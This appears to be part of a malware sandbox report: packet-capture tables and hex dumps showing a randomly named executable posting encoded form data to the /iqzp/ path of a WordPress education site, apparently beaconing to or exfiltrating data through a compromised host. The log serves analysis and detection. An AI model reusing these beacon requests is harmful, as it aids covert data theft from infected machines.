                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 62 63 58 68 79 35 36 39 37 69 71 42 75 47 61 52 71 51 46 66 66 71 6a 51 36 51 42 67 6f 56 72 79 5a 79 33 69 72 74 35 4d 4d 2f 49 72 79 41 2f 43 2f 51 34 76 4a 42 67 73 63 58 4c 37 48 52 61 2b 2f 67 77 57 31 2f 57 62 6e 32 4b 4a 6b 6c 53 66 76 41 5a 37 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wbcXhy5697iqBuGaRqQFffqjQ6QBgoVryZy3irt5MM/IryA/C/Q4vJBgscXL7HRa+/gwW1/Wbn2KJklSfvAZ7A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:42:50.409055948 CEST947INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTIwMDkzMjYtYjI4NS00YzRkLWE0NWQtYjNlMzNmMjYwNDMzIiwicGFnZV90aW1lIjoxNzE2ODA2NT


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549715103.138.88.50806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:06.346940041 CEST777OUTPOST /iqzp/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Origin: http://www.duhocvietanh.edu.vn
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.duhocvietanh.edu.vn/iqzp/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 53 73 56 57 6e 43 42 41 69 79 74 35 74 35 52 34 6e 6e 69 32 4e 70 68 6b 73 7a 6c 43 62 65 58 4d 66 6d 52 6f 59 56 50 4a 32 7a 79 63 50 59 73 6d 42 4d 33 6e 48 45 62 62 4a 73 4c 32 4b 43 30 50 6b 61 68 64 59 4a 4f 36 71 66 6a 59 61 52 2b 56 55 65 39 2b 49 4c 43 43 6a 6d 44 5a 5a 4e 4a 47 5a 49 7a 62 70 6f 6f 6e 4c 51 76 35 6c 6d 63 4e 68 63 74 65 51 75 4f 58 58 52 6f 55 53 42 45 4b 4f 42 66 63 71 63 56 47 78 45 45 48 38 45 5a 4f 31 75 69 5a 34 61 73 2f 4a 68 33 58 54 7a 76 53 51 32 59 67 51 37 64 51 4e 4f 36 2b 50 70 65 37 56 62 59 6f 36 57 49 43 2b 64 48 73 71 79 34 73 52 51 75 4c 65 6b 51 3d
                                          Data Ascii: 4b34ht=SsVWnCBAiyt5t5R4nni2NphkszlCbeXMfmRoYVPJ2zycPYsmBM3nHEbbJsL2KC0PkahdYJO6qfjYaR+VUe9+ILCCjmDZZNJGZIzbpoonLQv5lmcNhcteQuOXXRoUSBEKOBfcqcVGxEEH8EZO1uiZ4as/Jh3XTzvSQ2YgQ7dQNO6+Ppe7VbYo6WIC+dHsqy4sRQuLekQ=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549717103.138.88.50806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:08.877310038 CEST797OUTPOST /iqzp/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Origin: http://www.duhocvietanh.edu.vn
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.duhocvietanh.edu.vn/iqzp/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 53 73 56 57 6e 43 42 41 69 79 74 35 73 59 68 34 67 45 61 32 63 4a 68 6e 6e 54 6c 43 52 2b 58 49 66 6d 4e 6f 59 52 65 55 32 42 47 63 57 35 77 6d 41 4e 33 6e 43 45 62 62 52 38 4b 39 55 79 30 47 6b 62 63 71 59 49 69 36 71 65 48 59 61 56 79 56 58 76 39 39 4a 62 43 45 34 32 44 48 45 39 4a 47 5a 49 7a 62 70 6f 39 49 4c 51 6e 35 6d 58 73 4e 75 5a 42 66 63 4f 4f 55 55 52 6f 55 45 78 45 4f 4f 42 65 78 71 64 4a 34 78 42 49 48 38 45 70 4f 79 37 58 50 76 4b 73 35 4e 68 32 59 58 47 32 6f 57 56 5a 76 61 4b 6b 4d 63 73 2b 58 4b 66 7a 52 50 35 51 41 70 32 6b 36 75 4f 50 62 37 43 5a 46 4c 7a 2b 37 41 7a 45 32 4c 48 5a 62 43 52 65 6f 76 7a 4b 35 47 4c 6e 41 6c 6d 6c 64
                                          Data Ascii: 4b34ht=SsVWnCBAiyt5sYh4gEa2cJhnnTlCR+XIfmNoYReU2BGcW5wmAN3nCEbbR8K9Uy0GkbcqYIi6qeHYaVyVXv99JbCE42DHE9JGZIzbpo9ILQn5mXsNuZBfcOOUURoUExEOOBexqdJ4xBIH8EpOy7XPvKs5Nh2YXG2oWVZvaKkMcs+XKfzRP5QAp2k6uOPb7CZFLz+7AzE2LHZbCReovzK5GLnAlmld
                                          May 27, 2024 12:43:10.352641106 CEST1236INHTTP/1.1 404 Not Found
                                          Connection: close
                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          cache-control: no-cache, must-revalidate, max-age=0
                                          content-type: text/html; charset=UTF-8
                                          link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/"
                                          content-length: 10950
                                          content-encoding: br
                                          vary: Accept-Encoding,User-Agent,Accept-Encoding
                                          date: Mon, 27 May 2024 10:43:06 GMT
                                          server: LiteSpeed
                                          Data Raw: 82 ae 3a a2 b0 0f 17 51 d1 fa 21 40 23 65 e1 fc fd 11 32 cc fd a7 a6 f5 c5 56 55 07 f9 33 5c 2d 93 6d 00 02 a9 d3 54 d3 7d dc 33 77 bb 67 a6 b6 6c 97 0a 22 1f 49 d8 20 c0 06 40 1d a3 56 10 ee 15 fe 6c 8f 33 db 74 67 c2 3d 92 bc ff 4c f5 f3 2c cf f8 70 7f 9f 9b 74 43 14 a9 6a 87 e2 6f 5d de 3f f6 96 aa 01 41 88 80 8d c2 05 40 d1 74 49 ed 4e ab 76 4a 29 62 3a 35 be dc 99 ab bd af c5 37 64 76 f0 00 bc e2 47 2d 39 5c 48 99 2d bb cb dd d3 03 7e 02 5f 96 81 64 09 7c ad 04 22 90 03 50 d8 99 ee 99 f7 7e 92 fc 95 d6 31 c9 da e4 94 2f 38 01 fb 42 08 84 45 db 97 52 06 ec fd 8d 6f 8d 04 bd 6c e1 42 c3 e5 70 e1 2d 63 6a bb 7b 15 f2 08 e1 a8 01 bb 8c a5 b1 fb 9e 9e b7 2a 42 84 80 12 f2 d5 8d e5 d1 a0 1a 60 9d 61 41 73 68 f5 04 56 17 ce 09 1a f6 cb 75 dc af da 58 76 ef c1 58 e6 37 35 b9 7a 34 38 c4 c2 1e 85 f1 fa 45 23 9d c7 90 13 af f0 5d 57 8f 06 27 27 6e e8 e9 00 86 9c da 20 04 ae 60 2c e2 02 46 b6 98 13 1d cb 23 5c 90 f3 f5 82 9c e2 0a 0a fe e1 7b 31 5f 48 8d 79 82 06 1e e6 79 6b 1d 7c 78 03 7c 54 00 09 88 52 [TRUNCATED]
                                          Data Ascii: :Q!@#e2VU3\-mT}3wgl"I @Vl3tg=L,ptCjo]?A@tINvJ)b:57dvG-9\H-~_d|"P~1/8BERolBp-cj{*B`aAshVuXvX75z48E#]W''n `,F#\{1_Hyyk|x|TR@d&FHk=:at5 <WAy]PKL{WVo~oa$&|QXao>Vp#ek]9~x~A&OF06<aOkA(l]\[BJ YrM`PODQ5]0'j./5r|`+vru )c>P<w?9a!oV%U=+Ac.K%xn=4_?l`_<4_?QQ4AIViF4(H&1'l;-O~]H)dx-Hw(cgduOG2`gn0xy:?/g:B"0
                                          May 27, 2024 12:43:10.352674961 CEST1236INData Raw: 00 bf c8 df 57 95 35 c1 f3 da da 5a a3 ec 94 e7 85 6d 1f cb 20 06 5a 29 33 6b a8 c5 0c 91 81 71 20 6f 0c de 22 96 db 78 9d 94 f3 82 59 21 96 23 42 ca 61 f3 ca b6 2d 9a e0 69 a2 32 ca 22 ce ce de 13 03 ee c2 e8 88 c9 85 c8 d5 60 f4 04 aa 1f 6b c1
                                          Data Ascii: W5Zm Z)3kq o"xY!#Ba-i2"`k.)^]cr8K&<v[WvTX#(ry#B0OVoj~S?Mj9]$;B)%nGr{~F{l.)q9=9-R)=AE
                                          May 27, 2024 12:43:10.352932930 CEST1236INData Raw: 79 1e 86 c3 28 96 91 81 07 93 87 e1 e0 8f 1e 2f a9 30 e2 78 c2 cc 3f e5 e3 bb 53 69 59 53 c3 5f ff f8 fd 47 94 e5 3e 3f 4d a8 e1 37 6e c8 3e 5e 49 ad d7 b2 78 c8 ef 56 e0 91 c5 51 b4 46 7d 44 5a 0d 76 c2 81 81 65 7d f9 12 21 ee 13 c5 34 c2 dc f0
                                          Data Ascii: y(/0x?SiYS_G>?M7n>^IxVQF}DZve}!4j|9c^<,D8Cno8D6G!zmiB(ju|}&rzr0zwwWd4h{{66L`po;[qOA5'uK8NNf@V2''@Y_>,6W'
                                          May 27, 2024 12:43:10.353024960 CEST1236INData Raw: c6 0c ce 16 58 26 55 01 df 8a 71 2d 8b d9 e5 18 c7 df 24 5d ef 3a 8d 19 9c 5d ae a7 09 8a e6 c8 3e 38 6b 6a b6 47 ad ed 36 89 56 62 5d 8a f0 66 aa 3b c0 45 d9 91 be dd 94 74 92 4e 52 39 b4 6d d0 ed 45 0d ea b6 53 e7 97 f3 cb f9 65 0c 68 02 b8 eb
                                          Data Ascii: X&Uq-$]:]>8kjG6Vb]f;EtNR9mESeh~NMXYH+',Jkf4iixL].!Y1-%qQ4MMMARe`3eGRNGF4bJ((Ni"VG5$++s:`sM|
                                          May 27, 2024 12:43:10.353068113 CEST1236INData Raw: f3 95 bd 7f 78 b3 a1 49 9c 65 ba 8d 12 e1 71 65 80 92 a4 c7 6c 7e 08 8f 25 06 9c 94 52 b4 01 22 3c 8e 08 90 84 03 ee 8d 2d 04 99 c3 7f 22 54 73 9b 04 c4 95 60 e2 b6 8a a0 df 71 23 87 a8 3f 9b 5a ba 1a a9 84 0d 1d 12 cc 45 b3 7b 2e b9 7b 36 77 f9
                                          Data Ascii: xIeqel~%R"<-"Ts`q#?ZE{.{6w1f{5m;6->{{V@>s+R;SYVYEv*{/b**#HP*<XU:;dP#B
                                          May 27, 2024 12:43:10.353292942 CEST1236INData Raw: fa 22 0f 72 bd 85 1c fe e1 a4 9a 13 90 81 23 ac ec 07 e3 81 66 4d b9 de c6 b1 9b 9a be 7d 86 7f 7d 3e 21 8a f5 d9 24 d7 0d f6 99 6b 6a 6d a6 69 66 b6 a9 ad 69 56 25 be ae 9c 2a 91 fb b5 1a 55 22 03 40 86 06 44 4b 06 99 8b 81 03 96 6c 79 29 d2 f2
                                          Data Ascii: "r#fM}}>!$kjmifiV%*U"@DKly)sB>XBb[P"UGtuGZI|-9Qc+wM7$=~:A^o!\yA wl?U^T1sAEo+Fv#Z1FADF@pfs@E|isi
                                          May 27, 2024 12:43:10.353360891 CEST1236INData Raw: ff 57 db fe da a7 1e c5 d6 57 ef 57 49 b1 a5 bb 85 7b 56 60 e3 bc 98 0a 7d 52 2d 59 c1 b7 58 0a b2 89 cd e8 02 30 4d 61 7c 0b df e7 6d fd 6d 0e 8e f1 b6 fe 44 31 68 cd 83 b8 8c 6b 8e 1c e3 b4 10 0d 43 93 cf 77 6c c6 17 d8 67 7c 7b 18 17 a9 a1 4a
                                          Data Ascii: WWWI{V`}R-YX0Ma|mmD1hkCwlg|{JhcR/y[D]{[BSR|p:zQejriJi:`f?zx#*-hkeqJH~4>cnnrfv(b0F9R#rPhsp+V
                                          May 27, 2024 12:43:10.353434086 CEST1236INData Raw: 19 df 02 db f6 e7 ab 88 0d e3 a7 6d fd 4d 07 b6 ad cf 81 35 bf 52 0c da d5 0f 15 03 d2 d6 3f c5 40 9a 3f a9 0c 5c 55 9b 41 d4 f9 dc 6b 08 d9 65 4e 81 d1 6b bc e8 4e 77 16 33 0b 26 39 b8 f5 58 6b 69 91 3b 32 c5 44 ef 02 67 bf 37 65 df 8d fd b2 63
                                          Data Ascii: mM5R?@?\UAkeNkNw3&9Xki;2Dg7ecg"h8vbM04H.@1L<XM*!a8W!6~8WCl!pC<\=x=k|>i;ko[O!&^kNPZ`cV+lZ~eu%w>U8lR$i
                                          May 27, 2024 12:43:10.353466034 CEST1236INData Raw: 48 8c c3 ed 41 91 3c 1f 53 27 ec a9 b2 58 15 61 2f a8 e3 21 21 d2 13 32 e0 31 0a c3 ac 0c bd 14 54 c8 bf 62 d4 0f b3 b2 ef a3 8c 42 fe 15 a3 41 98 95 03 37 01 0a b9 8c 63 34 0c b3 72 e8 a6 6c 42 06 38 46 a3 30 2b 47 2e fa 25 22 d6 ab 66 2b 27 d6
                                          Data Ascii: HA<S'Xa/!!21TbBA7c4rlB8F0+G.%"f+'{;LT9zD65O$^=$cS@N*_;1iP*d&16stoAXq@2u"Xs7!3X_2eESpY$lfX~[r9|XZ
                                          May 27, 2024 12:43:10.353472948 CEST227INData Raw: 0a 0b 37 56 d9 63 74 57 d6 dd 54 73 25 8a fb 95 d0 8a 94 ba c4 a5 7b 59 a9 4b 2c fa a2 e1 56 3b 9d d3 6e 7e 98 a5 38 ae a2 5d 84 aa 0d 48 78 d9 1c a0 1a a2 fc 14 52 33 6e 35 82 2b 9d 0b 14 ca f1 fd 6b 8c 93 33 81 5b 73 38 a0 03 6c b0 10 f8 a8 aa
                                          Data Ascii: 7VctWTs%{YK,V;n~8]HxR3n5+k3[s8lis]>7%oTe<.qh(:/W<mUlc+{.P8UV-Lnq/)3\uDWykUBxC=,l8'.ojs#"


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549718103.138.88.50806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:11.408840895 CEST1814OUTPOST /iqzp/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Origin: http://www.duhocvietanh.edu.vn
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.duhocvietanh.edu.vn/iqzp/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 53 73 56 57 6e 43 42 41 69 79 74 35 73 59 68 34 67 45 61 32 63 4a 68 6e 6e 54 6c 43 52 2b 58 49 66 6d 4e 6f 59 52 65 55 32 42 65 63 57 72 55 6d 42 75 76 6e 42 45 62 62 59 63 4c 36 55 79 31 55 6b 61 30 6d 59 49 66 42 71 64 76 59 4c 41 75 56 63 37 68 39 47 62 43 45 78 57 44 47 5a 4e 49 45 5a 4a 44 58 70 6f 74 49 4c 51 6e 35 6d 55 45 4e 71 4d 74 66 65 4f 4f 58 58 52 6f 51 53 42 45 6d 4f 42 48 45 71 64 63 4e 77 79 41 48 38 6b 35 4f 33 4e 4c 50 73 71 73 37 41 42 33 48 58 47 79 4e 57 56 45 51 61 4b 51 6d 63 75 75 58 4b 70 4f 63 53 39 4d 68 37 51 67 6b 68 5a 58 37 6c 48 64 77 46 6a 69 4e 64 41 38 6f 50 6c 63 7a 42 6d 43 46 68 67 4b 7a 62 64 44 50 68 69 49 6a 31 41 30 6e 6f 62 43 63 76 37 34 6e 75 31 70 52 6d 55 4a 39 6e 76 52 53 67 7a 36 6d 43 36 31 4e 6e 31 6f 64 54 46 44 44 56 78 56 73 58 59 66 47 75 50 51 6e 51 35 33 2b 54 6e 2f 6e 5a 59 54 56 6d 4f 49 53 69 45 33 31 34 53 50 6e 68 38 53 30 58 30 54 67 4a 31 63 61 42 76 32 48 72 69 36 6a 64 35 30 70 31 6d 72 4e 66 4e 56 77 79 76 69 [TRUNCATED]
                                          Data Ascii: 4b34ht=SsVWnCBAiyt5sYh4gEa2cJhnnTlCR+XIfmNoYReU2BecWrUmBuvnBEbbYcL6Uy1Uka0mYIfBqdvYLAuVc7h9GbCExWDGZNIEZJDXpotILQn5mUENqMtfeOOXXRoQSBEmOBHEqdcNwyAH8k5O3NLPsqs7AB3HXGyNWVEQaKQmcuuXKpOcS9Mh7QgkhZX7lHdwFjiNdA8oPlczBmCFhgKzbdDPhiIj1A0nobCcv74nu1pRmUJ9nvRSgz6mC61Nn1odTFDDVxVsXYfGuPQnQ53+Tn/nZYTVmOISiE314SPnh8S0X0TgJ1caBv2Hri6jd50p1mrNfNVwyviG/PcBy2FDgzY+aRTaNUeZYSpWXVBdcAkn3vhv9SOx/Ton0DZwUIvkfU0mVCW5YA2feARrrZrQBOXPHDwVizyagD+kealS08i1RCKc8MDb3kj5vO3KZmFykax01ik+2rqn8c4BmKf6Jee1EYKiGhEb2az6qFzPPVjsPvNEgLawENtZxViq3Bakoxf5ahH1iTx+Vc8r+v+hsDQKnOa/yIOBLSCrKsQ3Dcfe4F41y26+vHiE7r86SqN92uIkA9D//mIznnsRXKRYmrqaIjggLOUwRCCKV022qaNoPWjryVqi9gT7PrL+u3ldwPe9xYol2szGEbFjU7rGUygKGzS+qMI9liouFNP5cWagLc1iBytTI04CR8q4pcQ2RnhsDSRiYkcpItrkLTRf3TWAZtixpnHCtwmxBo3VU6O7MDXWD8SmeuWeUlNaViZJiRwGqFb7cejQNl8YgagwhOaiL1b4aPyglD+mpMmbIYcqfQXINCmUN0PcbDEKk94pR3q8XEOKLRZA+NGmYhWDWuVzICFNyqjvqMjYRYwHK7LmoAGh97EgglbkIxCUKN9ndkWuxUOAJ0QwTLndu3+iE0OnxY0cMGgxPoeAG5LYhsn8c4DPp8a9z+FHSQAvkQstZwWOH2ZuBCDy+nLETjKmOMM7xpXmeVlB9VP8Q3Fn4bqUP [TRUNCATED]
                                          May 27, 2024 12:43:12.829499960 CEST1236INHTTP/1.1 404 Not Found
                                          Connection: close
                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          cache-control: no-cache, must-revalidate, max-age=0
                                          content-type: text/html; charset=UTF-8
                                          link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/"
                                          content-length: 10950
                                          content-encoding: br
                                          vary: Accept-Encoding,User-Agent,Accept-Encoding
                                          date: Mon, 27 May 2024 10:43:08 GMT
                                          server: LiteSpeed
                                          Data Raw: 82 ae 3a a2 b0 0f 17 51 d1 fa 21 40 23 65 e1 fc fd 11 32 cc fd a7 a6 f5 c5 56 55 07 f9 33 5c 2d 93 6d 00 02 a9 d3 54 d3 7d dc 33 77 bb 67 a6 b6 6c 97 0a 22 1f 49 d8 20 c0 06 40 1d a3 56 10 ee 15 fe 6c 8f 33 db 74 67 c2 3d 92 bc ff 4c f5 f3 2c cf f8 70 7f 9f 9b 74 43 14 a9 6a 87 e2 6f 5d de 3f f6 96 aa 01 41 88 80 8d c2 05 40 d1 74 49 ed 4e ab 76 4a 29 62 3a 35 be dc 99 ab bd af c5 37 64 76 f0 00 bc e2 47 2d 39 5c 48 99 2d bb cb dd d3 03 7e 02 5f 96 81 64 09 7c ad 04 22 90 03 50 d8 99 ee 99 f7 7e 92 fc 95 d6 31 c9 da e4 94 2f 38 01 fb 42 08 84 45 db 97 52 06 ec fd 8d 6f 8d 04 bd 6c e1 42 c3 e5 70 e1 2d 63 6a bb 7b 15 f2 08 e1 a8 01 bb 8c a5 b1 fb 9e 9e b7 2a 42 84 80 12 f2 d5 8d e5 d1 a0 1a 60 9d 61 41 73 68 f5 04 56 17 ce 09 1a f6 cb 75 dc af da 58 76 ef c1 58 e6 37 35 b9 7a 34 38 c4 c2 1e 85 f1 fa 45 23 9d c7 90 13 af f0 5d 57 8f 06 27 27 6e e8 e9 00 86 9c da 20 04 ae 60 2c e2 02 46 b6 98 13 1d cb 23 5c 90 f3 f5 82 9c e2 0a 0a fe e1 7b 31 5f 48 8d 79 82 06 1e e6 79 6b 1d 7c 78 03 7c 54 00 09 88 52 [TRUNCATED]
                                          Data Ascii: :Q!@#e2VU3\-mT}3wgl"I @Vl3tg=L,ptCjo]?A@tINvJ)b:57dvG-9\H-~_d|"P~1/8BERolBp-cj{*B`aAshVuXvX75z48E#]W''n `,F#\{1_Hyyk|x|TR@d&FHk=:at5 <WAy]PKL{WVo~oa$&|QXao>Vp#ek]9~x~A&OF06<aOkA(l]\[BJ YrM`PODQ5]0'j./5r|`+vru )c>P<w?9a!oV%U=+Ac.K%xn=4_?l`_<4_?QQ4AIViF4(H&1'l;-O~]H)dx-Hw(cgduOG2`gn0xy:?/g:B"0
                                          May 27, 2024 12:43:12.829521894 CEST224INData Raw: 00 bf c8 df 57 95 35 c1 f3 da da 5a a3 ec 94 e7 85 6d 1f cb 20 06 5a 29 33 6b a8 c5 0c 91 81 71 20 6f 0c de 22 96 db 78 9d 94 f3 82 59 21 96 23 42 ca 61 f3 ca b6 2d 9a e0 69 a2 32 ca 22 ce ce de 13 03 ee c2 e8 88 c9 85 c8 d5 60 f4 04 aa 1f 6b c1
                                          Data Ascii: W5Zm Z)3kq o"xY!#Ba-i2"`k.)^]cr8K&<v[WvTX#(ry#B0OVoj~S?Mj9]$;B)%nGr{~F{l.)
                                          May 27, 2024 12:43:12.829531908 CEST1236INData Raw: 93 e3 71 39 18 3d 39 2d b2 1e 52 29 3d 41 f6 c1 b2 a1 45 16 c6 12 9e 8c 06 a7 c7 0e be c5 48 51 13 1f 36 d2 81 a5 9e e2 72 5d 6f 28 22 8c 0f c1 ed d7 37 87 fc 30 2c ea f5 3e a1 0f 3e 43 5a 09 cd 64 55 bd 39 31 9f 45 f3 a7 e4 c7 2a 8a 8f 4b 8f de
                                          Data Ascii: q9=9-R)=AEHQ6r]o("70,>>CZdU91E*K+kuF1|F~s2P>q|5GjXHPAlF}bRZ]TK&~E/q9>2H_x)#.6ZjE}PaPk><M;BVB|(
                                          May 27, 2024 12:43:12.829685926 CEST1236INData Raw: 5f 06 c6 ae 3e e0 1d f3 8d 2c ed 36 08 d6 57 27 cb 20 c1 16 2e d4 41 c5 95 e6 ed 10 b2 df 19 08 10 5c cc 83 b0 5b a2 d6 03 4c 70 38 82 b3 3e 99 32 ed 98 67 04 10 cc 1a bd bf 56 fb 1e 45 dc d5 20 86 73 d9 1f 7d ad 6d f1 c0 b4 5a 3b e9 f6 52 c7 e6
                                          Data Ascii: _>,6W' .A\[Lp8>2gVE s}mZ;R;ZGaC|I`K{b0sH/J5J&t:]x;fu=rY)ADcYrv:A[WYiFE\39YgzD<5jik,,m
                                          May 27, 2024 12:43:12.829701900 CEST1236INData Raw: 8c d3 b1 f5 b0 60 99 89 73 4d 88 eb d2 f1 82 fe d6 04 7c 29 25 b3 4b 9a 2c 26 34 b9 9c 26 c5 0f f7 c2 5a cd 82 65 5b e9 5a e6 3b 2c 82 eb db 94 df db 7c 42 d3 f1 84 a6 e9 c3 57 9b 4c 13 9a a4 82 a6 e2 32 86 54 48 61 40 4a 93 c5 2c 86 c9 f2 8e f1
                                          Data Ascii: `sM|)%K,&4&Ze[Z;,|BWL2THa@J,N&*N\uNt.}=hS1xd*h:2a{M&qNt2aJ#TYe6/4I.\lJP-"x2fLnd6"s,1S
                                          May 27, 2024 12:43:12.829713106 CEST1236INData Raw: 0a 3b a5 f7 18 64 0a 50 23 42 ed 03 cd da da e0 83 93 1d a1 1a 70 e0 87 a9 78 4a f6 ff 99 ca 9a 20 b7 e8 6d 8b 4c 6a 4d 3d 07 3e 22 9f 34 39 d0 29 13 90 5e 05 36 22 74 c2 be a8 91 91 28 ec dc 1a 21 3d 50 7b 45 46 25 d9 71 3f cb 88 e5 ff cd da 4a
                                          Data Ascii: ;dP#BpxJ mLjM=>"49)^6"t(!=P{EF%q?Je3fIT.zoCloOp)R##]1j,A4upaxp$AuS'?X_O/}B<h6(?irXE@bky>pD
                                          May 27, 2024 12:43:12.829736948 CEST1236INData Raw: 66 98 93 cb 73 11 b3 d0 d0 40 06 94 45 c4 f3 7c 69 73 69 33 f3 cd 0c 34 35 9a cb 9b 5a 1a 10 28 2d 00 87 76 23 68 98 5e 53 13 72 c7 53 26 b6 31 5b 3b 51 3b c8 41 2c 2b f0 fc 59 16 a1 5f a3 4a bc ca bb ad ce 61 00 2b 3c 67 03 84 38 10 88 c1 30 c3
                                          Data Ascii: fs@E|isi345Z(-v#h^SrS&1[;Q;A,+Y_Ja+<g80ML577Z]{j^+oDSWCT\8njt7.1{{a oDEbAlm(FcwOL6aD;.("hm/}:Lc@=*@sAAd
                                          May 27, 2024 12:43:12.829757929 CEST1236INData Raw: f6 a0 b9 50 f0 ac 68 eb 73 f2 70 ba 0c 2b f4 56 a1 89 ef c5 50 bc de 62 d4 bf d4 e8 1f 7e eb 2f 36 17 1c 9e 68 9c 2a 0f 93 62 8e 84 36 80 78 7d c4 68 70 a9 31 d8 cd 6e 63 85 53 cc 46 82 c4 6a f4 bd 38 ba 0f 03 53 67 3c b9 3c ca 78 b2 09 6f 61 78
                                          Data Ascii: Phsp+VPb~/6h*b6x}hp1ncSFj8Sg<<xoax#'>F7\\^|K_Lf0|?gB u#N_Ox?!T!F/1F,~#{FVWvRsw[QL\ZsOC.%DkZ`
                                          May 27, 2024 12:43:12.829771996 CEST1236INData Raw: 25 77 8e 1a 98 d5 3e 55 f8 38 6c 52 c3 93 24 11 b4 84 69 a7 2a 04 f9 55 46 70 75 48 53 ae e8 ad ea 7b 0f af a5 f7 08 de 2b 9e 73 1c a7 ed 32 7d 8d 5b cf c6 5b a2 d3 d9 bc f9 93 5a aa fc 2c dc 32 14 a7 c4 14 32 91 2c 4f 47 6b 48 a4 dc f0 71 50 d3
                                          Data Ascii: %w>U8lR$i*UFpuHS{+s2}[[Z,22,OGkHqPMZ\`pLOYc#J57Ce(<sz{e&@i,^@@D,g^M?Dp=%?!gFb??HxYptbwFm*HNBvE
